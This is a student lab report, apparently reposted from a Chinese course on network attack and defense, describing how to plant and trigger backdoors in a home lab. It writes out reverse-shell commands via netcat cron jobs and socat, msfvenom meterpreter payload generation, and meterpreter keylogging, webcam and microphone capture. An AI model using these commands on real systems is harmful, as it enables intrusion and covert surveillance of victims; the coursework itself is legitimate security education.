Java教程

20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告

本文主要是介绍20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1.实验内容

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验过程

一、使用netcat获取主机操作Shell,cron启动

  1. 查看kali和主机的ip地址:
  • 这是主机的ip地址:

  • 这是kali的ip地址:

  1. Win10主机使用ncat程序监听本机的1221端口(端口可以随机,这里随便输入为1221)

  1. kali虚拟机netcat连接Win10主机,反弹shell后,成功getshell

  1. cron启动
  • crontab -e指令

  • 5 * * * * nc 192.168.211.1 1221 -e /bin/sh指令:每个小时的第5分钟,反向连接Windows主机1221端口

时间到了,getshell:

二、使用socat获取主机操作Shell, 任务计划启动

  1. 在任务计划程序中创建任务

进入管理界面之后点击创建任务

选择触发器——>新建,并将触发器配置成下图所示:

再点击操作——>新建,在程序或脚本里面找到socat路径,在参数里面填写 tcp-listen:1221 exec:cmd.exe,pty,stderr。 把cmd.exe绑定到端口1221,同时把cmd的stderr重定向到stdout上。

按Win+L锁定主机,再解锁之后,可以发现之前创建的任务已经开始运行了:

  1. 通过kali连接Win10主机

输入 socat - tcp:192.168.211.1:1221 指令连接Win10主机,getshell

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=1221 -f exe > 20192418.exe指令生成后门。

  1. 在Win10中使用ncat -lv 1221 > 20192418.exe指令将被控制主机进入接受文件模式

  1. 在kali中使用nc 192.168.72.1 1221 < 20192418.exe将后门传输过去

  1. 在kali上使用msfconsole指令进入msf控制台

  1. 输入指令进行连接
  • 输入use exploit/multi/handler使用监听模块,设置payload

  • 输入set payload windows/meterpreter/reverse_tcp 设置载荷,基于TCP的反向连接反弹windows shell

  • 输入 set LHOST 192.168.72.128 设置本主机IP

  • 输入 set LPORT 1221 设置本主机端口

  • 输入exploit,等待启动后门程序

  1. Win10主机运行后门“20192418.exe”

  1. kali上getshell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令可以截获一段录音音频:

  1. 使用webcam_snap指令可以调用摄像头进行拍照,效果如下:

  1. 使用 keyscan_start 指令记录键盘输入,使用 keyscan_dump 指令读取击键记录

  1. 使用 screenshot 指令可以进行截屏

五、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.72.128 LPORT=2418 -x ./pwn20192418 -f elf >20192418pwnshellcode

生成完payload之后,运行MSF(具体指令参考上一过程),再运行生成的20192418pwnshellcode文件,就可以getshell了

3.问题及解决方案

  • 问题1:ncat后,在cmd输入ls出现乱码
  • 问题1解决方案:中文名称的文件夹和文件会乱码

  • 问题2:传送后门到win10主机失败,0kb的文件且不可打开:

  • 问题2解决方案:直接使用文件拖动功能把后门从linux拖动到win10主机后运行

  • 问题3:生成的20192418pwn文件提示权限不够

  • 问题3解决方案:通过chmod +x 2012418pwn命令修改文件权限后即可运行

4.学习感悟、思考等

基础问题回答:

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    在非正规网站下载盗版软件,后门与盗版软件一并被下载。
  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    后台插入免杀进程,替换或感染系统文件。
  3. Meterpreter有哪些给你印象深刻的功能?
    获取密码,下载注册表,获取系统信息等功能。
  4. 如何发现自己有系统有没有被安装后门?
  • 定期使用杀毒软件进行查杀;
  • 查看主机上是否存在可疑进程。

感悟:

在本次实验中,我学习到了后门的原理,学会了怎样去制作后门和使用后门,还有MSF的使用。这次实验的难度不大,但是在实验过程中出现了很多各种各样的小问题,但是都能自己逐个解决,通过实验提高了自己的动手能力,本次实验让我受益匪浅。

参考资料

  • 《Java程序设计与数据结构教程(第二版)》
  • 《Java程序设计与数据结构教程(第二版)》学习指导
  • ...
这篇关于20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!